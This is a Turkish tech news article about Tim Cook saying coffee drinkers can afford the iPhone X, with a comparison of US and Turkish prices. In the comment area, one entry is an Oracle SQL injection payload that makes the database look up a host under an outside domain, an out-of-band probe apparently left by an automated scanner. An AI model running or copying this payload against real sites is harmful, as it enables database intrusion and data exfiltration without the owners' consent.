Tim Cook, Kahve İçen Herkesin iPhone X Alabileceğini Söyledi!

Apple'ın CEO'su Tim Cook iPhone X ile ilgili yine farklı bir açıklama yaptı. İşte haberin detayları...
04 Kasım 2017 19:21
Tim Cook, Kahve İçen Herkesin iPhone X Alabileceğini Söyledi!
Apple’ın en yetkili ismi Tim Cook iPhone X fiyatı için çarpıcı açıklamalar yaptı. Yüksek fiyatıyla eleştirilen iPhone X için kahve içen herkesin iPhone X alabileceğini söyledi.
 
Tim Cook iPhone X fiyatının yüksek olmadığını savundu
 
Tamamen yenilenen bir tasarımla karşımıza çıkan iPhone X, 3 Kasım itibariyle 55 ülkede satışa çıktı. Henüz ülkemizde resmi satışlarının başlamadığı model, Apple’ın şu ana kadar üretmiş olduğu en heyecan verici cihazlar arasında gösteriliyor.
 
Gündemden düşmeyen iPhone X, özellikleri ve tasarımıyla olduğu kadar fiyatıyla da çok konuşuluyor. Bu konudaki eleştirilere cevap vermek isten Tim Cook iPhone X fiyatının çok yüksek olmadığını savundu.
 
 
 
 
Hatta Tim Cook, yeni iPhone’un bir kahveden daha ucuz olduğunu savundu. Amerika’da en çok tüketilen içecekler arasında olan kahveyi örnek veren Cook, sürekli olarak kahve içen birisinin kahveye iPhone X aylık ödemesinden daha çok ödeme yaptığını söyledi. Eğer daha az kahve içilirse rahatlıkla iPhone X alınabileceğini belirtti.
 
Bu söyleyen Apple CEO’sunun muhtemelen ülkemizdeki fiyatlardan haberi yok. Zira Amerika’da 999 dolardan başlayan iPhone X, ülkemizde 6099 TL başlangıç fiyatına sahip. Türkiye’de ortalama bir kahvenin fiyatını da 10 TL olarak düşünürsek yılda yaklaşık olarak 610, ayda ise yaklaşık olarak 51 kahve demek oluyor bu.
 
shiftdelete
845644
'||CTXSYS.DRITHSX.SN(user,(select UTL_INADDR.GET_HOST_ADDRESS('bikuxjpichcasr0qqkwozdw9-wo7j3qkvojqvl8m'||'roq.r87.me') from DUAL))||'
04 Kasım 2017, Cumartesi 20:36
tim cookun kahvesi ne kadar acaba
Bu haberler ilginizi çekebilir